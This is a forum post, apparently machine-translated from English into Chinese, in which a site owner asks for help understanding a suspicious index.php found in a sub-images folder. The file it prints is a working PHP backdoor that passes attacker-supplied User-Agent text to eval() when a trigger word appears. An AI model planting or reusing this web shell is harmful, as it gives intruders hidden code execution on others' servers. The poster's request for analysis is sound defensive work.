我今天正在寻求您的帮助,以获取有关我今天早上在 FTP 中创建的文件的帮助。我不是所有这些 PHP 函数的专业人士,所以这就是我在这里发布它的原因。
我发现的是一个名为index.php的文件,位于 sub-images 文件夹中。
有原始代码:
<?php
if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }
?>
两个 PHP 函数
- eregi(); -> http://php.net/manual/en/function.eregi.php
- 评估();-> http://php.net/manual/en/function.eval.php
对于函数eval()他们说它非常危险。
注意eval() 语言结构非常危险,因为它允许执行任意 PHP 代码。因此不鼓励使用它。如果您已仔细验证除了使用此构造之外别无选择,请特别注意不要将任何用户提供的数据传入其中,而无需事先正确验证。
这就是为什么我认为这可能是某些人试图入侵我的网站甚至更多的原因。
任何人都有能力对此进行解码并向我解释吗?
谢谢,